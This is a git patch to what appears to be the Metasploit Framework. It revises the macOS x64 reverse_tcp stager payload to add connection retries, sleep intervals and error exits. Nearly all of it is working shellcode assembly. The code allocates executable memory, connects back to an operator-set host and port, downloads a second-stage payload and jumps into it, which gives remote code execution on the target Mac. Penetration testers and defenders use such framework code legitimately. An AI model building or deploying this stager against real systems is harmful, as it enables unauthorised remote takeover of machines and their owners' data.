From beda2d1efb98411c6e6fc2792ad0f451d65cde1d Mon Sep 17 00:00:00 2001
From: Tim W <timrlw@gmail.com>
Date: Fri, 5 Jan 2018 02:13:20 +0800
Subject: [PATCH] add retries and error checking to osx stager

---
 .../payloads/stagers/osx/x64/reverse_tcp.rb   | 126 ++++++++++++------
 1 file changed, 83 insertions(+), 43 deletions(-)

diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
index 6c9ce426a3..152c8a90c3 100644
--- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
@@ -27,61 +27,101 @@ module MetasploitModule
   def generate(opts = {})
     encoded_port = "%.8x" % [datastore['LPORT'].to_i,2].pack("vv").unpack("N").first
     encoded_host = "%.8x" % Rex::Socket.addr_aton(datastore['LHOST']||"127.127.127.127").unpack("V").first
-    stager_asm = %(
-    mov     rcx, ~0x#{encoded_host}#{encoded_port}
-    not     rcx
-    push    rcx
-    xor     ebp, ebp
-    bts     ebp, 25
+    retry_count = datastore['StagerRetryCount']
+    seconds = datastore['StagerRetryWait']
+    sleep_seconds = seconds.to_i
+    sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
 
+    stager_asm = %(
+    ; mmap(0x0, 0x1000, 0x7, 0x1002, 0x0, 0x0)
+    push 0
+    pop rdi
+    push 0x1000
+    pop rsi
+    push 7
+    pop rdx
+    push 0x1002
+    pop r10
+    push 0
+    pop r8
+    push 0
+    pop r9
+    push 0x20000c5
+    pop rax
+    syscall
+    jb failed
+
+    mov r12, rax
+    push 0
+    pop r10
+    push #{retry_count}
+    pop r11
+
+  socket:
     ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
-    push    rbp
-    pop     rax
-    cdq                      ; rdx=IPPROTO_IP
-    push    1
-    pop     rsi              ; rsi=SOCK_STREAM
     push    2
     pop     rdi              ; rdi=AF_INET
-    mov     al, 97
+    push    1
+    pop     rsi              ; rsi=SOCK_STREAM
+    push    0
+    pop     rdx              ; rdx=IPPROTO_IP
+    push    0x2000061
+    pop     rax
     syscall
-
-    mov     r13, rax
-    xchg    eax, edi         ; edi=s
-    xchg    eax, esi         ; esi=2
+    jb retry
 
     ; connect (sockfd, {AF_INET,4444,127.0.0.1}, 16);
-    push    rbp
-    pop     rax
+    mov     rdi, rax
+    mov     rax, ~0x#{encoded_host}#{encoded_port}
+    not     rax
+    push    rax
     push    rsp
     pop     rsi
-    mov     dl, 16           ; rdx=sizeof(sa)
-    mov     al, 98           ; rax=sys_connect
+    push    16
+    pop     rdx
+    push    0x2000062
+    pop     rax
     syscall
+    jb retry
 
-    ; mmap(0x0, 0x1000, 0x7, 0x1002, 0x0, 0x0)
-    pop r11
-    mov rsi, r11
-    xor rdi, rdi
-    mov rsi, 0x1000
-    mov eax, 0x20000c5
-    mov edx, 7
-    mov r10, 0x1002
-    xor r8, r8
-    xor r9, r9
-    syscall
-
-    ; recvfrom(0x3, addr, 0x1000)
-    mov rsi, rax
-    push rsi
-    mov rdi, r13
-    xor rcx, rcx
-    mov rdx, 0x1000
-    xor r10, r10
-    xor r8, r8
-    mov eax, 0x200001d
-    syscall
+    ; recvfrom(sockfd, addr, 0x1000)
+    mov rsi, r12
+    push 0x1000
+    pop rdx
+    push 0x200001d
     pop rax
-    call rax
+    syscall
+    jb retry
+
+    call r12
+
+  retry:
+    dec r11
+    jz failed
+
+    push 0
+    pop rdi
+    push 0
+    pop rsi
+    push 0
+    pop rdx
+    push 0
+    pop r10
+    push   0x#{sleep_nanoseconds.to_s(16)}
+    push   0x#{sleep_seconds.to_s(16)}
+    push rsp
+    pop r8
+    push 0x200005d
+    pop rax
+    syscall
+    jmp socket
+
+  failed:
+    push   0x2000001
+    pop    rax
+    push   0x1
+    pop    rdi
+    syscall ; exit(1)
     )
 
     Metasm::Shellcode.assemble(Metasm::X64.new, stager_asm).encode_string